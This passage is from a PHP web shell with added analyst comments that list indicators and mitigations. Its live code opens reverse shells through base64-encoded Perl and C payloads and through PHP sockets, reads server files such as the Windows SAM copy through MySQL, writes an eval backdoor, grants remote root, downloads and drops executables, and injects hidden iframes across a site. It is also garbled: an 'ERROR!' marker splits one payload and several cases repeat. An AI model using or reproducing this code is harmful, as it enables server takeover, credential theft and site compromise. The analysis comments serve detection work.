 <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">



	<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">

</div>

<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>

</form>

END;

	break;







// Web-shell action "linux": makes the web server connect back to a host/port supplied in POST
// fields yourip / yourport and attaches a command interpreter to that connection. The POST field
// `use` selects one of four methods (perl, c, php, nc).
// Triage indicators visible in this case:
//   - files /tmp/envl_bc and /tmp/envl_bc.c created by the web-server account;
//   - the web-server/PHP process spawning perl, gcc or a shell;
//   - outbound TCP connections originating from the web server (the form default port is 12388);
//   - cookies named yourip / yourport on requests to this script.
// Hardening that blunts it: egress filtering for the web tier, no compiler on production hosts,
// and process-execution / dl() functions listed in disable_functions.
// File_Write() and Exec_Run() are defined outside this view.
case "linux":



	// Form defaults: previously stored cookie values, else the requester's own address and port 12388.
	$yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');

	$yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';



	$system=strtoupper(substr(PHP_OS, 0, 3));

print<<<END

<div class="actall"><br>

			"nc -vv -l 12388"<br>

			IP,NC</div>

<form method="POST" name="kform" id="kform">

<div class="actall"> <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>

<div class="actall"> <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div>

<div class="actall"> <select name="use" >

<option value="perl">Perl</option>

<option value="c">C</option>

<option value="php">PHP</option>

<option value="nc">NC</option>

</select></div>

<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>

END;

	if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))

	{

    // $backip / $backport are not assigned anywhere in this view.
    setcookie('yourip',$backip);

	setcookie('yourport',$backport);

	

		echo '<div class="actall">';

		// Method "perl": a base64-embedded script is dropped to /tmp/envl_bc and run with the POSTed
		// host and port appended to the command line unescaped.
		if($_POST['use'] == 'perl')

		{

			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

			echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bc<br>' : '/tmp/envl_bc<br>';

			$perlpath = Exec_Run('which perl');

			$perlpath = $perlpath ? chop($perlpath) : 'perl';

			@unlink('/tmp/envl_bc.c');

			echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';

		}

		// Method "c": a base64-embedded C source is dropped to /tmp/envl_bc.c, compiled with gcc to
		// /tmp/envl_bc, the source is deleted, and the binary is run with the POSTed host and port.
		// NOTE(review): the literal below contains an "ERROR!" marker and a line break mid-string,
		// which looks like an artefact of the decoding/extraction step; compare against the original
		// sample rather than hashing this listing.
		if($_POST['use'] == 'c')

		{

			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIERROR!
GR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

			echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.c<br>' : '/tmp/envl_bc.c<br>';

			$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');

			@unlink('/tmp/envl_bc.c');

			echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '';

		}

		// Method "php": no file is dropped. The sockets extension is loaded with dl() if missing,
		// a TCP connection is opened from within the PHP process, and each line received on it is
		// executed through proc_open() with stdout and stderr written back to the socket.
		if($_POST['use'] == 'php')

		{

		if(!extension_loaded('sockets'))

           {

	        if ($system == 'WIN') {

		        @dl('php_sockets.dll') or die("Can't load socket");

	        }else{

	    	    @dl('sockets.so') or die("Can't load socket");

	        }

           }

		   if($system=="WIN")

           {

         	$env=array('path' => 'c:\\windows\\system32');

            }else{

	        $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');

           }

           $descriptorspec = array(

         	0 => array("pipe","r"),

	        1 => array("pipe","w"),

	        2 => array("pipe","w"),

           );

		   $host = $_POST['yourip'];

       	   $port = $_POST['yourport'];

           $host=gethostbyname($host);

           $proto=getprotobyname("tcp");

           if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){

             die("Socket");

           }

           if(($ret=socket_connect($sock,$host,$port))<0){

             die("");

           }else{

             // Banner sent on connect; a fixed string that can serve as a network signature.
             $message="----------------------PHP--------------------\n";

             socket_write($sock,$message,strlen($message));

             $cwd=str_replace('\\','/',dirname(__FILE__));

             // The HTTP request stays open for as long as this loop runs, so a long-lived
             // PHP worker tied to one request is another host-side indicator.
             while($cmd=socket_read($sock,65535,$proto)){

                if(trim(strtolower($cmd))=="exit"){

                   socket_write($sock,"Bye\n");

                   exit;

                }else{

                   $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);

                   if (is_resource($process)) {

	                fwrite($pipes[0], $cmd);

	                fclose($pipes[0]);

	                $msg=stream_get_contents($pipes[1]);

	                socket_write($sock,$msg,strlen($msg));

	                fclose($pipes[1]);

	                $msg=stream_get_contents($pipes[2]);

	                socket_write($sock,$msg,strlen($msg));

	                $return_value = proc_close($process);

                   }

                }

		   }

		  }

		}

		// Method "nc": fsockopen() to the POSTed host/port, then each line read from the socket is
		// executed with the backtick operator and the output written back. The banner and prompt
		// strings written to the socket are fixed and usable as network signatures.
		if($_POST['use'] == 'nc')

		{

	     echo '<div class="actall">';

		 $mip=$_POST['yourip'];

		 $bport=$_POST['yourport'];

		 $fp=fsockopen($mip , $bport , $errno, $errstr);

		 if (!$fp){

		     $result = "Error: could not open socket connection";

		    }else {

		 fputs ($fp ,"\n*********************************************\n 

		              hacking url:http://www.google.com is ok!        

			          \n*********************************************\n\n");

	     while(!feof($fp)){ 

         fputs ($fp," [r00t@H4c3ing:/root]# ");

         $result= fgets ($fp, 4096);

         $message=`$result`;

         fputs ($fp,"--> ".$message."\n");

                          }

         fclose ($fp);

		       }

         echo '</div>';

		}



		echo '<br> (nc -vv -l '.$_POST['yourport'].') ';

	}

break;



	// Web-shell action "sqlshell": a browser-driven MySQL client that also abuses MySQL's
	// file functions. It connects with POSTed host/port/user/password through the legacy
	// mysql_* API (removed in PHP 7.0) and offers three things:
	//   - POST field downfile: read a server-side file via load_file() and stream it as a download
	//     (form shown when $_GET['o'] is 'd');
	//   - $_GET['o'] == 'u': write an uploaded file to an arbitrary path via SELECT ... INTO DUMPFILE;
	//   - otherwise: run an arbitrary statement taken base64-encoded from POST field msql.
	// Database-side indicators: load_file(0x...) calls, INTO OUTFILE / INTO DUMPFILE statements,
	// a short-lived table named `a` with a single `cmd` column, and the GRANT ALL ... 'root'@'%'
	// preset listed in the embedded script.
	// Mitigations: no FILE privilege for web-application database accounts, a restrictive
	// secure_file_priv, and no remote root login.
	// File_Str(), File_Read() and File_Up() are defined outside this view.
	case "sqlshell":

	$MSG_BOX = '';

	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';

	if(isset($_POST['mhost']) && isset($_POST['muser']))

	{

		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];

		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);

		else $MSG_BOX = 'MYSQL';

	}

	// Form default is the Windows SAM backup copy, which shows what this download mode is meant for.
	$downfile = 'c:/windows/repair/sam';

	if(!empty($_POST['downfile']))

	{

		$downfile = File_Str($_POST['downfile']);

		// The path is hex-encoded into the statement, so the file name does not appear
		// as readable text in query logs; decode 0x literals when reviewing them.
		$binpath = bin2hex($downfile);

		$query = 'select load_file(0x'.$binpath.')';

		if($result = @mysql_query($query,$conn))

		{

			$k = 0; $downcode = '';

			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}

			$filedown = basename($downfile);

			if(!$filedown) $filedown = 'envl.tmp';

			$array = explode('.', $filedown);

			$arrayend = array_pop($array);

			// Response headers are built from the requested file name without sanitising.
			header('Content-type: application/x-'.$arrayend);

			header('Content-Disposition: attachment; filename='.$filedown);

			header('Content-Length: '.strlen($downcode));

			echo $downcode;

			exit;

		}

		else $MSG_BOX = '';

	}

	$o = isset($_GET['o']) ? $_GET['o'] : '';

// First heredoc: client-side list of preset statements (read a file, write a PHP file
// through INTO OUTFILE, grant remote root access).
print<<<END

<script language="javascript">

function nFull(i){

	Str = new Array(11);

	Str[0] = "select version();";

	Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";

	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";

	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";

	nform.msql.value = Str[i];

	return true;

}

END;

// html_base() is defined outside this view; presumably it emits the base64encode() helper used below.
html_base();

// The connection fields, including the database password, are echoed back into the form unescaped.
print<<<END

function SubmitUrl(){

			document.getElementById('msql').value = base64encode(document.getElementById('msql').value);

			document.getElementById('nform').submit();

}

</script>

<form method="POST" name="nform" id="nform">

<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL]</a> 

<a href="?eanver=sqlshell&o=u">[MYSQL]</a> 

<a href="?eanver=sqlshell&o=d">[MYSQL]</a></div>

<div class="actall">

 <input type="text" name="mhost" value="{$mhost}" style="width:110px">

 <input type="text" name="mport" value="{$mport}" style="width:110px">

 <input type="text" name="muser" value="{$muser}" style="width:110px">

 <input type="text" name="mpass" value="{$mpass}" style="width:110px">

 <input type="text" name="mdata" value="{$mdata}" style="width:110px">

</div>

<div class="actall" style="height:220px;">

END;

// Upload mode: the uploaded bytes are hex-encoded into an INSERT on a temporary table `a`,
// then written out by the database server process with INTO DUMPFILE to the POSTed path.
// The resulting file is owned by the MySQL service account, not the web-server account.
if($o == 'u')

{

	$uppath = 'C:/Documents and Settings/All Users////exp.vbs';

	if(!empty($_POST['uppath']))

	{

		$uppath = $_POST['uppath'];

		$query = 'Create TABLE a (cmd text NOT NULL);';

		if(@mysql_query($query,$conn))

		{

			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}

			else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}

			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';

			if(@mysql_query($query,$conn))

			{

				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';

				$MSG_BOX = @mysql_query($query,$conn) ? '' : '';

			}

			else $MSG_BOX = '';

			// The staging table is dropped whether or not the write succeeded.
			@mysql_query('Drop TABLE IF EXISTS a;',$conn);

		}

		else $MSG_BOX = '';

	}

print<<<END

<br><br> <input type="text" name="uppath" value="{$uppath}" style="width:500px">

<br><br> <input type="file" name="upfile" style="width:500px;height:22px;">

</div><div class="actall"><input type="submit" value="" style="width:80px;">

END;

}

// Download mode: only renders the form; the work happens in the downfile branch above.
elseif($o == 'd')

{

print<<<END

<br><br><br> <input type="text" name="downfile" value="{$downfile}" style="width:500px">

</div><div class="actall"><input type="submit" value="" style="width:80px;">

END;

}

// Default mode: free-form statement execution.
else

{

	if(!empty($_POST['msql']))

	{

		$msql = $_POST['msql'];

		// Statements arrive base64-encoded, so request-body inspection has to decode this field first.
		$msql = base64_decode($msql);

		if($result = @mysql_query($msql,$conn))

		{

			$MSG_BOX = 'SQL<br>';

			$k = 0;

			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}

		}

		else $MSG_BOX .= mysql_error();

	}

print<<<END

<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>

<div class="actall">

<select onchange="return nFull(options[selectedIndex].value)">

	<option value="0" selected></option>

	<option value="1"></option>

	<option value="2"></option>

	<option value="3"></option>

</select>

<input type="button" value="" onclick="SubmitUrl();" style="width:80px;">

END;

}

	// Query results and database error text are echoed without HTML escaping.
	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';

	else echo '</div></center></form>';

	break;

	

    // Web-shell action "downloader": fetches the URL in POST field durl with file_get_contents()
    // and writes the body to the path in POST field dpath. Both values are request-controlled and
    // unrestricted, so this is how further tooling gets staged onto the host.
    // Detection / mitigation: outbound HTTP requests made by the PHP process, new files (for
    // example executables) appearing next to the script, and allow_url_fopen left enabled.
    // The form default file name is muma.exe in the script's own directory.
    // File_Str() and File_Write() are defined outside this view.
    case "downloader":

	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';

	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');

// Both values are interpolated into the form unescaped.
print<<<END

	<form method="POST">

    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>

    <div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>

    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form>

END;

	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))

	{

		echo '<div class="actall">';

		// '@' hides fetch warnings, so failures leave nothing in the PHP error log.
		$contents = @file_get_contents($_POST['durl']);

		if(!$contents) echo '';

		else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';

		echo '</div>';

	}

	break;



	// Web-shell action "issql": database browser. MySQL credentials posted once are kept in the
	// PHP session, then the page lists databases, tables and full table contents, and executes
	// any statement posted in field `sql`.
	// Notes for analysis:
	//   - Uses the legacy mysql_* API (removed in PHP 7.0).
	//   - Database and table names from $_GET are concatenated straight into statements and into
	//     HTML; nothing is escaped.
	//   - Credentials persist in the server-side session store, so session files on a
	//     compromised host may contain database passwords.
	//   - Database-side indicators: SHOW DATABASES / SHOW COLUMNS followed by unbounded
	//     SELECT * from the web application's account.
	// html_n(), html_a(), html_select(), html_input() and css_js() are defined outside this view.
	case "issql":

	session_start();

  if($_POST['sqluser'] && $_POST['sqlpass']){

    $_SESSION['sql_user'] = $_POST['sqluser'];

    $_SESSION['sql_password'] = $_POST['sqlpass'];

  }

  // Host and port fall back to localhost:3306 on every request that does not post them.
  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}

  else{$_SESSION['sql_host'] = 'localhost';}

  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}

  else{$_SESSION['sql_port'] = '3306';}

  if($_SESSION['sql_user'] && $_SESSION['sql_password']){

    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){

      // Failed login clears the stored credentials and ends the request.
      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);

      die(html_a('?eanver=sqlshell',''));

    }

  }

  else{

    die(html_a('?eanver=sqlshell',''));

  }

  $query = mysql_query("SHOW DATABASES",$sqlcon);

  html_n('<tr><td>:');

  while($db = mysql_fetch_array($query)) {

		html_a('?eanver=issql&db='.$db['Database'],$db['Database']);

		echo '&nbsp;&nbsp;';

	}

  html_n('</td></tr>');

  if($_GET['db']){

  	css_js("3");

    mysql_select_db($_GET['db'], $sqlcon);

    html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');

    html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");

    html_input("submit","doquery","");

    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);

    html_n('--->');

    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);

    html_n('</form><br>');

  	// Arbitrary statement execution; only success or the error text is reported.
  	if(!empty($_POST['sql'])){

			if (@mysql_query($_POST['sql'],$sqlcon)) {

				echo "SQL";

			}else{

				echo ": ".mysql_error();

			}

  	}

    // Table view: column header row, then every row of the table with no LIMIT.
    if($_GET['table']){

      html_n('<table border=1><tr>');

      $query = "SHOW COLUMNS FROM ".$_GET['table'];

      $result = mysql_query($query,$sqlcon);

      $fields = array();

      while($row = mysql_fetch_assoc($result)){

        array_push($fields,$row['Field']);

        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');

      }

      html_n('</tr><tr>');

      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());

      while($text = @mysql_fetch_assoc($result)){

      	foreach($fields as $row){

      		if($text[$row] == "") $text[$row] = 'NULL';

      		html_n('<td>'.$text[$row].'</td>');

      	}

      	echo '</tr>';

      }

    }

    // Database view: one link per table.
    else{

      $query = "SHOW TABLES FROM" . $_GET['db'];

      $dat = mysql_query($query, $sqlcon) or die(mysql_error());

      while ($row = mysql_fetch_row($dat)){

        html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");

      }

    }

  }

	break;

	

    // Second occurrence of the "downloader" label in this listing, with the same body as the
    // earlier one. If both sit in the same switch (its header is outside this view), PHP runs the
    // first matching case and this copy is never reached. Duplicated cases like this suggest the
    // file was assembled by pasting fragments together, which helps when clustering variants.
    // Behaviour as written: fetch the URL in POST field durl and write it to the path in POST
    // field dpath, both request-controlled.
    case "downloader":

	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';

	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');

print<<<END

	<form method="POST">

    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>

    <div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>

    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form>

END;

	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))

	{

		echo '<div class="actall">';

		// '@' hides fetch warnings; File_Write() is defined outside this view.
		$contents = @file_get_contents($_POST['durl']);

		if(!$contents) echo '';

		else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : '';

		echo '</div>';

	}

	break;



	case "issql":

	session_start();

  if($_POST['sqluser'] && $_POST['sqlpass']){

    $_SESSION['sql_user'] = $_POST['sqluser'];

    $_SESSION['sql_password'] = $_POST['sqlpass'];

  }

  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}

  else{$_SESSION['sql_host'] = 'localhost';}

  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}

  else{$_SESSION['sql_port'] = '3306';}

  if($_SESSION['sql_user'] && $_SESSION['sql_password']){

    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){

      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);

      die(html_a('?eanver=sqlshell',''));

    }

  }

  else{

    die(html_a('?eanver=sqlshell',''));

  }

  $query = mysql_query("SHOW DATABASES",$sqlcon);

  html_n('<tr><td>:');

  while($db = mysql_fetch_array($query)) {

		html_a('?eanver=issql&db='.$db['Database'],$db['Database']);

		echo '&nbsp;&nbsp;';

	}

  html_n('</td></tr>');

  if($_GET['db']){

  	css_js("3");

    mysql_select_db($_GET['db'], $sqlcon);

    html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');

    html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'");

    html_input("submit","doquery","");

    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);

    html_n('--->');

    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);

    html_n('</form><br>');

  	if(!empty($_POST['sql'])){

			if (@mysql_query($_POST['sql'],$sqlcon)) {

				echo "SQL";

			}else{

				echo ": ".mysql_error();

			}

  	}

    if($_GET['table']){

      html_n('<table border=1><tr>');

      $query = "SHOW COLUMNS FROM ".$_GET['table'];

      $result = mysql_query($query,$sqlcon);

      $fields = array();

      while($row = mysql_fetch_assoc($result)){

        array_push($fields,$row['Field']);

        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');

      }

      html_n('</tr><tr>');

      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());

      while($text = @mysql_fetch_assoc($result)){

      	foreach($fields as $row){

      		if($text[$row] == "") $text[$row] = 'NULL';

      		html_n('<td>'.$text[$row].'</td>');

      	}

      	echo '</tr>';

      }

    }

    else{

      $query = "SHOW TABLES FROM " . $_GET['db'];

      $dat = mysql_query($query, $sqlcon) or die(mysql_error());

      while ($row = mysql_fetch_row($dat)){

    html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");

      }

    }

  }

	break;

	

	// Web-shell action "upfiles": multi-file upload to an arbitrary directory. The target
	// directory comes from POST field uppath and the file name from the client-supplied upload
	// name; neither is validated, so any file type can be written anywhere the web-server
	// account can write.
	// Detection / mitigation: multipart POSTs to this script carrying upfile[] parts, new script
	// files appearing under the web root, and write permission for the web-server account on
	// directories that are also executable by PHP.
	// Triage note: the unparenthesised nested ternary in the upload loop is a compile-time error
	// on PHP 8, so a file containing it only loads on PHP 7.x or older.
	// html_n(), html_input() and str_path() are defined outside this view.
	case "upfiles":

	html_n('<tr><td>: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');

	html_input("text","uppath",root_dir,"<br>: ","51");

// Client-side helpers that add and remove file-input rows in the table with id "tank".
print<<<END

<SCRIPT language="JavaScript">

function addTank(){

var k=0;

  k=k+1;

  k=tank.rows.length;

  newRow=document.all.tank.insertRow(-1)

  <!---->

  newcell=newRow.insertCell()

  newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"

}



function delTank() {

  if(tank.rows.length==1) return;

  var checkit = false;

  for (var i=0;i<document.all.tankNo.length;i++) {

    if (document.all.tankNo[i].checked) {

      checkit=true;

      tank.deleteRow(i+1);

      i--;

    }

  }

  if (checkit) {

  } else{

    alert("");

    return false;

  }

}

</SCRIPT>

<br><br>

<table cellSpacing=0 cellPadding=0 width="100%" border=0>       

          <tr>

            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value="   " name="button2"/>

            <input name="button3"  type="button" class="button01" onClick="delTank()" value="" />

            </td>

          </tr>

</table>

<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >

<tr><td></td></tr>

<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>

</table>

END;

	html_n('<br><input type="submit" name="upfiles" value="" style="width:80px;"> <input type="button" value="" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');

	if($_POST['upfiles']){

		foreach ($_FILES["upfile"]["error"] as $key => $error){

			if ($error == UPLOAD_ERR_OK){

				$tmp_name = $_FILES["upfile"]["tmp_name"][$key];

				// Client-supplied name is used as-is for the destination file name.
				$name = $_FILES["upfile"]["name"][$key];

				$uploadfile = str_path($_POST['uppath'].'/'.$name);

				// Tries copy() and move_uploaded_file(); $msg is defined outside this view.
				$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];

				echo '<br><br>'.$upload;

			}

		}

	}

	html_n('</form>');

	break;

	

	// Web-shell action "guama": bulk content injection. It takes a directory (POST path), a
	// '|'-separated list of file extensions (POST type) and a snippet (POST code), and hands them
	// to do_passreturn() together with the mode chosen by the radio buttons (POST return:
	// "guama" or "qingma").
	// do_passreturn() is defined outside this view; presumably it walks the directory and adds or
	// removes the snippet in every matching file — confirm against its definition.
	// The form's default snippet is a hidden 1x1 iframe, so the site-side indicator is an
	// unexpected zero- or one-pixel iframe across many .html/.php/.asp/.jsp pages with
	// near-identical modification times. File-integrity monitoring on the web root catches this.
	case "guama":

	$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;

	$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";

	$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";

	html_n('<tr><td>"|",.<form method="POST"><br>');

	html_input("text","path",$patht,"","45");

	html_input("checkbox","pass","","","",true);

	html_input("text","type",$typet,"<br><br>","60");

	html_text("code","67","5",$codet);

	html_n('<br><br>');

	html_radio("","","guama","qingma");

	html_input("submit","passreturn","");

	html_n('</td></tr></form>');

	if(!empty($_POST['path'])){

		html_n('<tr><td>:<br><br>');

		// Checkbox "pass" becomes a boolean flag passed to do_passreturn() (presumably "recurse
		// into sub-directories"; confirm against do_passreturn()).
		if(isset($_POST['pass'])) $bool = true; else $bool = false;

		do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);

	}

	break;

	

	// Web-shell action "tihuan": bulk edit of files under a directory. It passes POST path,
	// POST newcode and POST oldcode to do_passreturn() with the fixed mode string "tihuan".
	// do_passreturn() is defined outside this view; presumably it replaces one string with the
	// other in every file it visits — confirm against its definition.
	// Site-side indicator: many files under the web root modified within the same second.
	case "tihuan":

	html_n('<tr><td>,.<br><br><form method="POST">');

	html_input("text","path",root_dir,"","45");

	html_input("checkbox","pass","","","",true);

	// Posted values are fed back into the form; html_text() is defined outside this view.
	html_text("newcode","67","5",$_POST['newcode']);

	html_n('<br><br>');

	html_text("oldcode","67","5",$_POST['oldcode']);

	html_input("submit","passreturn","","<br><br>");

	html_n('</td></tr></form>');

	if(!empty($_POST['path'])){

		html_n('<tr><td>:<br><br>');

		// Checkbox "pass" becomes a boolean flag passed to do_passreturn().
		if(isset($_POST['pass'])) $bool = true; else $bool = false;

		do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);

	}

	break;

	

	// Web-shell action "scanfile": searches files under a directory. It passes POST path and
	// POST code to do_passreturn() with the mode chosen by the radio buttons (POST return:
	// "scanfile" or "scancode").
	// The preset list names common PHP applications (Discuz, PHPWind, phpcms, dedecms, PHPBB,
	// wordpress, ...) and the visible label mentions MYSQL, so the likely purpose is locating
